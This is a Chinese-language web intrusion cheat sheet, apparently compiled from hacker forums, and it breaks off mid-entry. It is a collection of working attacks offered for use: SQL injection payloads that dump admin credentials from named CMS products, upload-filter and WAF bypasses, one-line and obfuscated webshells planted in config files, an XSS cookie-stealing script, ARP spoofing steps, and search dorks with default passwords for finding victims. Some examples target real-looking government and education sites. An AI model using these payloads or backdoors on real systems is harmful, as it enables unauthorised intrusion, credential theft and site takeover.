由於火狐瀏覽器有保留cookie的功能，先登陸後臺，以管理員的權限進行上傳，直接把1.html拖進火狐瀏覽器裏，直接點擊備份便可突破cookie驗證！

=============================================================================================================================================================

【 本地構造限制上傳類型漏洞 】

通常用於直接掃到的上傳頁面，名稱是：上傳圖片，上傳asp、asa等腳本時提示「請選擇jpg或gif文件!」

這時經過這個方法通常都能成功，首先保存到本地1.asp  放到小旋風的目錄下，而後找到如下這段代碼：

    alert(「請點擊瀏覽按鈕，選擇您要上傳的jpg或gif文件!」)
myform.file1.focus;
return (false);
}
else
{
str= myform.file1.value;
strs=str.toLowerCase();
lens=strs.length;
extname=strs.substring(lens-4,lens);
if(extname!=」.jpg」 && extname!=」.gif」)
{
alert(「請選擇jpg或gif文件!」);

看到這句代碼：if(extname!=」.jpg」 && extname!=」.gif」)  改成：    if(extname!=」.jpg」 && extname!=」.gif」 && extname!=」.asp」)

而後補充完整上傳地址，action=這裏，而後網頁打開127.0.0.1 直接上傳asp文件就能夠了。

=============================================================================================================================================================

【 抓包改包NC提交拿shell 】

1.抓包數據中若是存在name=」filepath」或是name=」filename」，那麼就能夠知足NC的上傳條件了。

2.將木馬的抓包數據複製到文本文件中。例如：1.txt

3.將路徑補全：

filepath截斷法：
uploadfile/路徑後添加1.asp空格 (16進制下面將20改成00)

filename自定義名稱：
C:\Documents and Settings\lei\桌面\1.jpg (將1.jpg 改成 1.asp空格，16進制下將20改成00)

3.在Content-Length處加上../uploadfile/後增長的字節數。

4.用C32將空格的20改成00，保存爲1.txt。

5.把1.txt跟nc.exe放在同一目錄下，cmd命令：nc -vv www.XXXX.com 80<1.txt

( 若是上傳成功後沒有將木馬解析成asp，能夠嘗試將文件名改爲asa、cer、php 再不行就用IIS 6.0解析漏洞，將文件名改成1.asa;1.jpg )

=============================================================================================================================================================

【 抓包nc上傳獲取管理權限 】

這個方法至關於cookie欺騙，首先到前臺去註冊一個會員，註冊成功後在登陸的那一刻，用抓包工具進行抓包，把抓到的數據複製到1.txt裏面。

接下來打開，把雙引號裏棉的數據「X-Forwarded-For: 127.0.0.2′,group_id = 1 where loginname = ‘會員的賬號’#」 放在Content-Length：的下面。

在看到最底下的loginname=這行代碼，把最後面的驗證碼改爲當前會員登錄的驗證碼，而後將nc\1.txt 放在同一個目錄下，cmd命令：nc 域名 80<1.txt

成功提交上去後，剛纔的會員賬戶將變成管理員賬戶了，找到該站的後臺地址登陸便可實現cookie欺騙！

=============================================================================================================================================================

【 cookie欺騙 】

當咱們經過注入或是社工把管理員的賬號跟md5密碼搞到手的時候，卻發現破解不出密碼 (MD5是16位加密的)

那麼咱們就能夠用COOKIE欺騙來繞過，利用桂林老兵的cookie欺騙工具，把本身的ID以及md5密碼都修改爲管理員的，再修改cookie，訪問時就會實現欺騙了。

=============================================================================================================================================================

【 cookie中轉突破防注入 】

有時檢測一個網站，系統會彈出一些SQL防注入的提示框，這時咱們能夠利用COOKIE中轉註入來進行突破，首先準備一個webshell，而後打開COOKIE中轉工具。

複製注入點到「注入URL地址跟來源頁」處，把問號去掉，再把問號後面的ID=剪切到「注入鍵名」裏，再把ID=後面那個參數剪切到「POST提交值」裏替換jmdcw=後面的參數。

點擊生成，再把生成的文件上傳到webshell裏，而後訪問路徑，再頁面地址後面加「?jmdcw=參數」，這樣搭建構造出來的注入點就繞過防注入了！

以上是在webshell裏搭建ASP壞境的方法，下面的是本地架設ASP環境的方法：

利用簡易IIS服務器搭建一個環境，再將COOKIE中轉生成的文件放到簡易IIS服務器的目錄下！而後運行簡易IIS服務器，在後面+文件名+問號+jmdcw=參數便可。

=============================================================================================================================================================

【 cookie手工突破防注入 】

第一種方法：

用 and 1=1 and 1=2 檢測網站是否存在注入點時，若是提示你的IP已被記錄，就說明系統作了防注入措施，能夠用代碼來突破。

管理員只過濾了and，可是沒有過濾or，咱們能夠先猜網站的字段數 格式：order by 數字  猜到錯爲止，而後選前一個對的數字！

好比猜到14錯誤，那就是13了，而後利用Cookie提交變量值，代碼：javascript:alert(document.cookie=id=」+escape(「這裏填寫變量值，例如：id=408″));

開始猜解表段，代碼：javascript:alert(document.cookie=」id=」+escape(「變量值 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13 from admin」));

複製在瀏覽器裏打開，將出現一個提示框，點擊肯定就會注射進去，再從新打開網站（要在此處打開，因此前面最好複製下網站地址）

而後就會出現兩個提示數字，好比5跟6，而後在代碼的5跟6處猜賬號密碼，常見的賬號有：user  username  密碼:pass  password

複製修改後的代碼放到瀏覽器裏打開，就會爆破出網站的賬號密碼了。

 

第二種方法：

注入點： http://www.XXXXXXXX.gov.cn/shownews.asp?id=4098

首先把?id=408去掉，而後訪問若是提示「數據庫出錯」！就說明網站沒有過濾Cookie提交方式，能夠利用Cookie欺騙繞過防注入！

利用Cookie提交變量值，代碼：javascript:alert(document.cookie=」id=」+escape(「4098″)

下面開始在Cookie注入中執行常規注入攻擊，提交代碼：javascript:alert(document.cookie=」id=」+escape(「4098 and 1=1″));

訪問 http://www.XXXXXXXX.gov.cn/shownews.asp 顯示正常頁面，

再提交代碼：javascript:alert(document.cookie=」id=」+escape(「4098 and 1=2″));  顯示錯誤頁面！

下面來開始猜解表段，提交代碼：javascript:alert(document.cookie=」id=」+escape(「4098 and exists (select * from 表段)」))；

接着猜字段，提交代碼：javascript:alert(document.cookie=」id=」+escape(「4098 and exists (select 字段 from admin)」))；  例如：username

接着猜字段，提交代碼：javascript:alert(document.cookie=」id=」+escape(「4098 and exists (select 字段 from admin)」)),   例如：password

下面開始猜字段數跟字段內容了，提交代碼:javascript:alert(document.cookie=」id=」+escape(「4098 and 1=2 union select 1,2,3,4,5,6 from 表段」));

一直猜解到對爲止，這裏只是猜到6，記得繼續加減！猜解到對的時候，頁面會出現數字，而後在相對應的數字替換字段名，再進行提交代碼！

這時若是字段名猜對的話，就會爆出賬號密碼了，不對的話繼續替換字段名，位置不變！（存在cookie注入時建議參考mysql手工注入的語句）

=============================================================================================================================================================

【 僞靜態注入 】

僞靜態網站注入方法，萊鳥掃盲來了哦，一般狀況下，動態腳本的網站的url相似下面這樣：

http://www.91ri.org/news.php?id=111

作了僞靜態以後就成這樣了：

http://www.91ri.org/news.php/id/111.html

以斜槓「/」代替了「=」並在最後加上.html，這樣一來，就沒法直接用工具來注入了。

常規的僞靜態頁面以下： http://www.XXX.com/play/Diablo.html

例如關聯的動態頁面是game.php ，那麼當用戶訪問後程序會自動轉換成相似 http://www.XXX.com/game.php?action=play&name=Diablo的形式

注入點檢測能夠用： http://www.XXX.com/play/Diablo‘ and 1=’1.html與 http://www.XXX.com/play/Diablo‘ and 1=’2.html來判斷

一般狀況下，動態腳本的網站的url相似下面這樣： http://www.xxoo.net/aa.php?id=123

作了僞靜態以後相似這樣： http://www.xxoo.net/aa.php/id/123.html 以斜槓「/」代替了「=」並在最後加上.html，這樣一來，就沒法直接用工具來注入了！

=============================================================================================================================================================

【 嗅探 】

當入侵一個網站，該網站沒有任何漏洞的狀況下，能夠進行旁註，再提權拿下任意一臺服務器，不行的話就C段，提權拿下任意一臺服務器。

只要能拿下同網段的任意一臺服務器，就可使用C段嗅探來獲取主站的賬號密碼，cain是一款強大的劫持工具。

在服務器裏安裝cain後打開主控端，點擊配置->選擇服務器IP一項->在路由追蹤一項取消所有->肯定。

設置完畢後點擊一下激動按鈕(中間那個)，再點擊嗅探器，點擊加號符號，選擇全部在子網主機，選擇ARP測試(傳播 31-位)，肯定。

掃描完畢選擇網關一項，點擊ARP，點擊加號符號，左邊選擇網關，右邊選擇所有的C段，肯定，點擊開始嗅探按鈕(第三個)，嗅探到的賬號密碼在口令一項展示！

若是發現沒數據可使用幻境網盾來限制網速，讓cain的發包快過防火牆。

=============================================================================================================================================================

【 arp欺騙 】

只要該服務器存在C段，均可以嘗試arp欺騙，用到的工具是NetFuke，想知道arp劫持能不能成功，cmd命令：arp -a  看一下，動態的服務器IP就能成功，靜態的就不能。

安裝完運行主控端，設置–嗅探設置–網卡選擇服務器的IP–控制選項選擇「啓用ARP欺騙、啓用過濾器、啓用分析器、啓用修改器、主動轉發」 肯定。

設置–ARP欺騙–雙向欺騙–來源Ip填服務器的網關–中間人IP填服務器的IP–目標IP填要欺騙的任意C段ip(用御劍掃描C段)–肯定。

插件管理–修改器–最後一個選項雙擊–在右邊的HTML Body = [haha!!] 填寫本身要展示的文字，點擊開始便可欺騙成功！

=============================================================================================================================================================

【 突破安全狗防注入及上傳 】

寫入webshell 寫不進去，日常的一句話 也失效，用這段代碼：

<%@ Page Language=」C#」 ValidateRequest=」false」 %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance(「c」, true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>

鏈接端用cncert的aspx一句話客戶端

二、IIS6.0解析漏洞遇到安全狗

文件名爲 http://www.baicai.com/1.asp;1.jpg

這樣的會被IIS安全狗果斷屏蔽

改爲以下名稱,IIS6同樣會解析:

www.baicai.com/;1.asp;1.jpg

三、安全狗的注入繞過

經常使用的如baicai.asp?id=1 and 1=1 是會被安全狗屏蔽的。
但這樣就能夠突破了：

baicai.asp?0day5.com=%00.&id=69%20 and 1=1

=============================================================================================================================================================

【 跨站xss 】

在網站留言或者能輸入信息的地方提交跨站代碼，從而盜取管理員cookie，而後用cookie瀏覽器直接進入後臺，將如下代碼保存爲asp文件，例如1.asp

 

<%
thisfile=Server.MapPath(「cookie.txt」)
msg=Request(「msg」)
set fs=server.CreateObject(「scripting.filesystemobject」)
set thisfile=fs.OpenTextFile(thisfile,8,True,0)
thisfile.WriteLine(「=======cookie:」&msg&」======by:劍眉大俠」)
thisfile.close
set fs=nothing
%>

首先搭建一個asp環境，推薦使用「ASP服務器（擺脫安裝IIS）」 再將1.asp放在wwwroot目錄下，訪問1.asp文件若是提示下載，則說明搭建成功了。

而後在留言板的「您的網站」一處輸入：<script>doucument.location=’ http://127.0.0.1/1.asp?msg=‘document.cookie</script>

當管理員瀏覽咱們提交的留言時，將在wwwroot目錄下生成一個cookie.txt文件，這時咱們只要訪問cookie.txt這個文件，就能知道管理員的cookie是多少了！

而後再使用桂林老兵的cookie欺騙工具或是網頁源代碼查看分析器，訪問網站再輸入cookie進行欺騙登陸便可！（填cookei的時候記得選擇自定義）

小技巧：要想讓管理員早點瀏覽你提交的留言，能夠經過打電話，QQ客服等去社工他便可。

=============================================================================================================================================================

【 爆庫 】

%5C爲十六進制的\符號，而數據庫大於5.0就能夠爆庫，若一個網站數據庫大於5.0，且是ACESS數據庫，若不能注入的注入點是： http://www.xxx.com/rpc/show24.asp?id=127

咱們直接把%5C加到rpc後面，由於%5C是爆二級目錄，因此應該是這樣， http://www.xxx.com/rpc%5c/show24.asp?id=127

而%23是表明#，若是管理員爲了防止他人非法下載數據庫，而把數據庫改爲#database.mdb,這樣防止了。

若是頁面地址爲： http://www.xx.com/rpd/#database.mdb ; 把%23替換#就能夠下載了，即： http://www.xx.com/rpd/%23database.mdb

還有利用默認的數據庫路徑  http://www.xxx.com/ 後面加上 conn.asp 若是沒有修改默認的數據庫路徑，也能夠獲得數據庫的路徑（注意：這裏的/也要換成%5c）

若是你能看到：’E:/ahttc040901/otherweb/dz/database/iXuEr_Studio.asa’不是一個有效的路徑。 肯定路徑名稱拼寫是否正確，以及是否鏈接到文件存放的服務器。

這樣的就是數據庫了。下載時用FLASHGET換成.MDB格式的就行.

=============================================================================================================================================================

【 利用sql注入點判斷網站和數據庫是否站庫分離 】

在注入點後加上：and exists(select * from admin where 1=(Select (case when host_name()=@@servername then 1 else 0 end)))

注意admin必定要是存在的表段，若是返回正常，說明網站和數據庫是在同一服務器，若是不正常則說明是站庫分離的。

=============================================================================================================================================================

【 iis6.0 PUT寫入漏洞 】

利用工具：IIS PUT Scaner、桂林老兵IIS寫權限利用程序

一、IIS來賓用戶對網站文件夾有寫入權限
二、web服務器擴展力設置webDAV爲容許，即：WebDAV—打勾
三、網站主目錄:寫入—打勾(可PUT)
四、網站主目錄:腳本資源訪問—打勾（可COPY、MOVE）

你們都清楚，寫權限就是容許PUT，與網站自身運行的權限無絲毫聯繫，若是開啓了，就是沒有一點安全意識，就給咱們提供了大大的方便。

首先用御劍工具掃下C段，好比：12.12.12.1 – 12.12.12.255  打開IIS PUT Scaner，把12.12.12.1放在Start IP 這裏，12.12.12.255放在End IP 這裏，

接着在Port這裏，換成80，點擊Scan開始嗅探，當PUT這裏顯示是Yes就說明存在漏洞，能夠右鍵選擇PUT file，輸入文件名1.txt，下面填內容，保存就能夠寫入了。

或是利用「桂林老兵IIS寫權限利用程序」也能夠，這款工具比較強大，把域名填寫進去，例如：www.xxx.com，而後在請求文件那裏輸入你的文件名，

在數據包格式那裏選擇PUT，有的會直接彈出瀏覽文件框，沒有就本身選擇，在下面，而後點擊提交數據庫便可，通常是先PUT一個txt文件，再MOVE成asp木馬。

直接提交asp木馬的話，若是MOVE方法不行，能夠試試Copy。

=============================================================================================================================================================

【 ACCESS執行SQL語句導出一句話拿webshell 】

原理大體和php網站的outfile差很少，在access後臺其餘方法不能拿到webshell，可是後臺有SQL語句查詢執行，就能夠直接access導出一句話拿webshell了。

 

不過須要知道物理路徑才能導出，利用IIS的解析漏洞導出EXCEL文件拿到webshell，由於ACCESS數據庫不容許導出其餘危險格式，咱們導出爲EXCEL後在利用IIS解析漏洞就能夠變成咱們的木馬了。

點「服務器信息探測」，得到網站路徑：e:\web\webshellcc\的EXCEL 點「系統管理」-》「自定義執行SQL」，試一下，可以執行的話能夠用access導一句話拿下shell。

create table cmd (a varchar(50))  創建一個有一個A字段的表 表名爲cmd 字段類型爲字符 長度爲50

insert into cmd (a) values (‘<%execute request(chr(35))%>’)  在表cmd的a字段插入密碼爲#的一句話木馬

select * into [a] in ‘e:\web\webshellcc\1.asa;x.xls’ ‘excel 4.0;’ from cmd  把cmd表a的內容導出到路徑e:\web\webshellcc\的EXCEL文件

drop table cmd  刪除創建的cmd表

菜刀鏈接： http://www.xxx.com/1.asa;x.xls

=============================================================================================================================================================

【 利用過濾’or’='or’修改代碼進行繞過 】

例如後臺地址是： http://www.hdminc.net/admin/admin_index.asp

當用萬能密碼登陸的時候，會出現一些過濾or的提示！

請右鍵查看源文件，另存爲桌面 XX.html，而後打開找到如下這段代碼，進行刪除！

<script language=」javascript」>
function chencklogin()
{
if(document.login.username.value==」)
{alert(‘請輸入用戶名’);
document.login.username.focus();
return false
}
if (document.login.password.value==」)
{alert(‘請輸入密碼’);
document.login.password.focus();
return false
}
}
</script>

注意：將如下段代碼中的 「index.asp?action=chkadmin」 修改成 「 http://www.hdminc.net/admin/admin_index.asp「

<form action=」index.asp?action=chkadmin」 name=」login」 method=」past」 onsubmit=return checklogin();」>

最後保存打開，再用’or’='or’登陸時，系統已再也不過濾，結果就能用萬能密碼登陸進去了！

=============================================================================================================================================================

【 動力3.5拿shell 】

inurl:printpage.asp?ArticleID=

1.找到版權信息，把內容替換成：

版權全部 Copyright? 2003 <a href=’ http://www.asp163.net‘>動力空間</a>」 ‘版權信息

if Request(「xiaoxin」)=」520″ then
dim allen,creat,text,thisline,path
if Request(「creat」)=」yes」 then
Set fs = CreateObject(「Scripting.FileSystemObject」)
Set outfile=fs.CreateTextFile(server.mappath(Request(「path」)))
outfile.WriteLine Request(「text」)
Response.write 「小新恭喜」
end if
Response.write 「<form method=’POST’action=’」&Request.ServerVariables(「URL」)&」?xiaoxin=520&creat=yes’>」
Response.write 「<textarea name=’text’>」&thisline&」</textarea><br>」
Response.write 「<input type=’text’ name=’path’ value=’」&Request(「path」)&」‘>」
Response.write 「<input name=’submit’ type=’submit’ value=’ok’ ></form>」
Response.end
end if
%>

2.而後保存，千萬別跳轉任何頁面，直接在IE地址欄內將 admin/Admin_Login.asp 替換成 inc/config.asp?xiaoxin=520

3.成功後會進入一個像小馬同樣的頁面，粘貼木馬代碼以及寫上木馬文件名便可拿到wshell，木馬在inc目錄。

=============================================================================================================================================================

【 動易cms拿shell 】

點擊網站配置，在網站名稱後面插入一句話木馬，鏈接inc/config.asp

=============================================================================================================================================================

【 aspcms】

簡要描述：後臺文件AspCms_AboutEdit.asp 未進行驗證，且未過濾，致使SQL注入。

爆賬號密碼：
admin/_content/_About/AspCms_AboutEdit.asp?id=1 and 1=2 union select 1,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35 from aspcms_user where userid=1

版本不一樣須要更改值。

第二種方法，找到後臺，而後/admin/_system/AspCms_SiteSetting.asp?action=saves

直接POST
[php]runMode=1&siteMode=1&siteHelp=%B1%BE%CD%F8%D5%BE%D2%F2%B3%CC%D0%F2%C9%FD%BC%B6%B9%D8%B1%D5%D6%D0

 

&SwitchComments=1&SwitchCommentsStatus=1&switchFaq=0:Y=request(chr(35)):execute(Y)&SwitchFaqStatus=0&dirtyStr=&waterMark=1&

waterMarkFont=hahahaha&waterMarkLocation=1&smtp_usermail=aspcmstest%40163.com&smtp_user=aspcmstest&smtp_password=aspcms.cn

&smtp_server=smtp.163.com&MessageAlertsEmail=13322712%40qq.com&messageReminded=1&orderReminded=1&applyReminded=1&commentReminded=1

&LanguageID=1[/php]

再鏈接配置文件config.asp 密碼爲#

老版本中能夠經過添加模板直接添加asp.可是新版已經限制了添加模板的格式爲html,js,css

固然若是是遇到iis6的話仍是能夠經過iis6的解析漏洞把文件名改爲1.asp;.html這樣的格式來拿到shell的.

方法：點擊「界面風格」，而後選「編輯模板/CSS文件」，而後「添加模板」，文件名稱寫error.asp;.html，文件內容寫一句話<%eval request(「g」)%>

而後添加，會提示添加成功，而後在模板列表中就能夠找到咱們添加的一句話了，用菜刀鏈接便可！

但是若是遇到iis7.5呢? 如下是本人本身找到挖掘到的aspcms通殺版本的後臺拿shell方法.

一、進入後臺，「擴展功能」–「幻燈片設置」–」幻燈樣式」

二、使用chorme的審查元素功能或者firefox的firebug，總之使用能修改當前頁面元素的工具就行了，將對應的slidestyle的value的值修改成1%><%Eval(Request (chr(65)))%><%

三、一句話木馬，密碼a。在/config/AspCms_Config.asp

 

=============================================================================================================================================================

【 XYCMS企業建站系統 】

關鍵詞：inurl:showkbxx.asp?id=

默認數據庫：data/xy#!123.mdb

默認帳戶密碼：admin admin

找到網站配置，在網站名稱裏面直接插入一句話：網站」%><%eval request(「x」)%><%’，注意不要刪掉網站名稱！而後中國菜刀鏈接：/inc/config.asp

或是找到網站地址，在http://後面加上一句話木馬，而後菜刀連接配置文件：inc/config.asp

=============================================================================================================================================================

【 szwyadmin漏洞繞事後臺驗證 】

關鍵字:inurl:szwyadmin/login.asp

javascript:alert(document.cookie=」adminuser=」+escape(「‘or’='or’」));javascript:alert(document.cookie=」adminpass=」+escape(「‘or’='or’」));javascript:alert(document.cookie=」admindj=」+escape(「1″));

1.後臺通常存在一個szwyadmin文件夾，複製一下後臺地址放在一邊，以後複製代碼替換後臺地址訪問進行注射！

2.這時會彈出一個窗口，連續點擊三次肯定。

3.從新訪問後臺地址，把網站後面的/login.asp 換成 admin_index.asp 奇蹟般的直接進入後臺了！

=============================================================================================================================================================

【 醫院建站系統任意文件上傳漏洞 】

關鍵詞：inurl:cms/Column.aspx?
關鍵詞：inurl:cms/Column.aspx?LMID=

漏洞利用 ：xtwh/upfile.aspx

直接上傳aspx木馬拿shell。

=============================================================================================================================================================

【 Struts 2遠程執行命令漏洞 】

struts 2一種java-web的MVC框架技術，和傳統的struts1有很大的改進。

嚴格來講，這實際上是XWork的漏洞，由於Struts 2的核心使用的是WebWork，而WebWork又是使用XWork來處理action的。

關鍵詞：inurl:common/common_info.action?wid=

http://www.xxxxx.com/xxx.action 通常頁面以.action結尾的幾乎都存在這個漏洞，能夠用工具檢測一下就知道了。

這個漏洞是在Java運行環境下利用的，Java運行環境下載地址： http://www.orsoon.com/Soft/12080.html

=============================================================================================================================================================

【 嘉友科技cms上傳漏洞 】

谷歌關鍵字：inurl:newslist.asp?NodeCode=

程序採用的上傳頁uploadfile.asp未進行管理驗證，致使創建畸形目錄上傳圖片木馬獲取shell漏洞。

exp：ploadfile.asp?uppath=mad.asp&upname=&uptext=form1.mad.asp

 

他原上傳目錄是:uploadfile.asp?uppath=PicPath&upname=&uptext=form1.PicPath

並且他的上傳文件沒有過濾致使未受權訪問，直接上傳小馬，而後小馬後面寫爲1.jpg  訪問路徑 查看源代碼。

=============================================================================================================================================================

【 ecshopcms後臺拿shell 】

支持最新2.7.2版本，通殺最新版本後臺低權限！

<?php $filen=chr(46).chr(46).chr(47).chr(110).chr(117).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112); $filec=chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(117).chr(115).chr(98).chr(93).chr(41).chr(59).chr(63).chr(62); $a=chr(119); $fp=@fopen($filen,$a); $msg=@fwrite($fp,$filec); if($msg) echo chr(79).chr(75).chr(33); @fclose($fp); ?>

後臺-訂單管理-訂單打印-選擇源代碼編輯-保存-返回訂單列表，隨意選擇一個訂單打印，返回OK，生成一句話成功-在根目錄生成了一個null.php，一句話密碼：usb

=============================================================================================================================================================

【 phpcms2008版本 直接執行php代碼漏洞 】

關鍵字：inurl:yp/product.php

exp代碼：pagesize=${${@eval_r($_POST[cmd])}}

測試網站： http://www.slsdgc.com.cn/yp/product.php?catid=721

利用方法： http://www.slsdgc.com.cn/yp/product.php?pagesize=${${@eval_r($_POST[cmd])}}

菜刀鏈接： http://www.slsdgc.com.cn/yp/product.php?pagesize=${${@eval_r($_POST[cmd])}}  密碼cmd

菜刀鏈接注意如下格式：

   默認級別                    php                       gb2312

=============================================================================================================================================================

【 教育站sql注入通殺0day 】

關鍵詞：inurl:info_Print.asp?ArticleID=

默認後臺：website/ad_login.asp

好比： http://www.psfshl.pudong-edu.sh.asp?ArticleID=1650

加上：union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin

這樣就直接獲得了管理員帳戶和通過Md5加密的密碼了。

=============================================================================================================================================================

【 IIS7.0 畸形解析漏洞通殺oday 】

找到某個使用IIS7.0架設的站，而後找到其中的圖片上傳點（不須要管理權限，普通註冊用戶便可搞定），把PHP一句話圖片木馬綴改爲.jpg，傳上去，獲得圖片地址。

在圖片格式後面添加xx.php xx隨便你怎麼填，只要後綴爲.php就好，以後菜刀鏈接便可！

=============================================================================================================================================================

【 Yothcms 遍歷目錄漏洞 】

優斯科技企業網站管理系統(YothCMS)是一款徹底開源免費的CMS。

默認後臺：admin/login.asp

遍歷目錄：ewebeditor/manage/upload.asp?id=1&dir=../

數據庫路徑：%23da%23ta%23\%23db_%23data%23%23.asa

=============================================================================================================================================================

【 傳信網絡獨立開發網站源碼0day漏洞 】

默認後臺：system/login.asp

編輯器後臺路徑：ubbcode/admin_login.asp

數據庫路徑：ubbcode/db/ewebeditor.mdb

默認帳號密碼：yzm   111111

=============================================================================================================================================================

【 科訊cms 6.5後臺拿shell 】

1.能夠在數據庫備份中找到網站的絕對路徑

2.利用科訊SQL注入漏洞利用工具也能找到

 

進入後臺後執行sql命令：
create table E:\wenxiushi\wz001\\KS_Data\Collect\KS_Collect.Mdb.cmd  (a varchar(50))
insert into E:\wenxiushi\wz001\KS_Data\Collect\KS_Collect.Mdb.cmd  (a) values (‘┼攠數畣整爠煥敵瑳∨∣┩愾’)

接着數據庫備份成1.asp  菜刀鏈接密碼：#

=============================================================================================================================================================

【 動易2006後臺拿shell 】

進入後臺後，咱們在左邊菜單欄中選擇「系統設置」，而後在出現的菜單欄裏選擇「自定義頁面管理」，

接着須要先添加一個自定義頁面分類，選擇「添加自定義分類」這個選項，分類名稱與分類簡介均可以隨便填寫。填寫完畢後選擇「添加」，系統提示添加成功。

下面再來選擇「添加自定義頁面」，「頁面名稱」隨便輸入，「所屬分類」就是剛纔創建的分類就能夠了。「頁面類型」和「頁面路徑」都不用管，保持默認.

不過若是沒有改頁面路徑的話，默認生成的文件是在根目錄下的，也就是 http://www.xx.com/maer.asp.「文件名稱」即輸入生成的木馬的文件名。

「頁面簡介」也不用管，下面就是頁面內容了。這裏填入小馬的代碼。一切完畢點擊「添加」會提示保存自定義頁面成功。最後一步是要生成咱們的木馬頁面。

選擇「自定義頁面管理首頁」，點擊右邊出現的「生成本頁」就OK 了，成功得到動易的shell。

=============================================================================================================================================================

【 Shopex4.8.5 注入漏洞後臺拿shell 】

關鍵詞：powered by shopex v4.8.5

exp:

<html>

<head>

<title>Shopex 4.8.5 SQL Injection Exp</title>

</head>

<body>

<h2>Shopex 4.8.5 SQL Injection Exp (product-gnotify)</h2>

<form action=」 http://www.lpboke.com/?product-gnotify」 method=」post」 name=」submit_url」>

        <input type=」hidden」 name=」goods[goods_id]」 value=」3″>

        <input type=」hidden」 name=」goods[product_id]」 value=」1 and 1=2 union select 1,2,3,4,5,6,7,8,concat(0x245E,username,0x2D3E,userpass,0x5E24),10,11,12,13,14,15,16,17,18,19,20,21,22 from sdb_operators」>

        <input type=」submit」 value=」">

</form>

fuck

<body>

</html>

保存爲html格式，替換代碼中的網站，本地打開後點擊小圖標，出現新頁面，賬號密碼爆出來了，默認後臺：shopadmin

拿shell方法….

第一步 頁面管理 修改模版 而後選一個XML編輯

開始用 live http 抓包 大家懂的 而後把第一個POST包給抓出來

而後改包 id=1273923028-info.xml&tmpid=1273923028&name=index_temp.php&file_source=

解釋一下 id是你選擇的模版文件夾名稱 後面的info.xml 是你修改的XML文件 tmpid= 大家懂的 就是模版文件夾 而後 name 是你提交的文件名字 file_source 是後門或者shel

我這裏是一句話 大家懂的 而後提交了以後 地址是這樣的 http://Madman.in/themes/文件名稱/你的木馬名稱

=============================================================================================================================================================

【 ecshop漏洞總彙 】

關鍵字：powered by ecshop

 

普通代碼：user.php?act=order_query&order_sn=’ union select 1，2，3，4，5，6，concat(user_name，0x7c，password，0x7c，email)，8 from ecs_admin_user/*

變種代碼：search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319

直接在網站後臺加入代碼回車就能爆出賬號密碼，再去掉代碼加上/admin回車就能直接進後臺了。

 

拿shell方法很簡單，找到「庫項目管理」再選擇「配送的方式」，在代碼最下面插入php一句話木馬：<?php eval($_POST[x]);?> 不行就換php木馬的預代碼！

接着保存，一句話路徑是： http://www.xxx.org/myship.php ; 打開「ASP+PHP兩用Shell.html」填入地址，點擊一下環境變量，成功以後點擊上傳文件就能夠拿shell了。

=============================================================================================================================================================

【 ESPCMS通殺0day 】

關鍵字：inurl:index.php?ac=article&at=read&did=

默認後臺：adminsoft/index.php 或者 admin/

注入點(爆表前綴，好比：cm_admin……前綴就是cm，後面3個代碼要自行替換):

index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0×27,table_name,0×27,0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

爆用戶名：

index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0×27,username,0×27,0x7e)) from 前綴_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

爆密碼：

index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0×27,password,0×27,0x7e)) from 前綴_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

密碼和用戶一次性爆：

index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0×27,username,0×27,password)) from 前綴_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

拿shell：

進到後臺後，直接點擊分類圖片===修改==選擇文件===直接上傳一句話木馬

PS：
當上傳不了php網馬時，去系統設置一下，添加圖片上傳格式 |php 這樣就能夠上傳一個圖片文件頭的網馬。

=============================================================================================================================================================

【 帝國cms 6.6最新版本 】

自定義頁面-增長自定義頁面-隨便寫個.php文件名，內容寫：<script language=」php」>echo base64_decode(「PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4=」);</script>

若是內容直接添一句話或者php大馬是無用的，由於他會生成xxx.php前先給你執行，

PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4=  就是 <?php @eval($_POST['cmd']);?> 的base64加密。

因此生成xxx.php後 會出現內容 <?php @eval($_POST['cmd']);?> 在文件裏，而後用菜刀直接鏈接吧。

=============================================================================================================================================================

【 phpweb 】

關鍵字：inurl:down/class/index.php?myord=

後臺地址：admin.php

萬能密碼：admin ‘or ’1′=’1

注入地址：down/class/index.php?myord=1

表段：pwn_base_admin

拿shell通殺漏洞：登入後臺–文章–文章發佈–文章內容裏的圖片上傳按鈕–抓包以後改包NC提交。

也能夠用下面的exp拿shell：

用火狐瀏覽器登陸後臺，由於火狐瀏覽器有保留cookies的功能， 找到「phpweb之exp」這個html，拉進火狐瀏覽器器裏上傳1.php;.jpg的一句話木馬，查看源碼菜刀鏈接！

=============================================================================================================================================================

【 動科(dkcms)漏洞分析 】

官方網站：www.dkcms.com

 

主要是差很少3個版本爲主吧，

V2.0   data/dkcm_ssdfhwejkfs.mdb

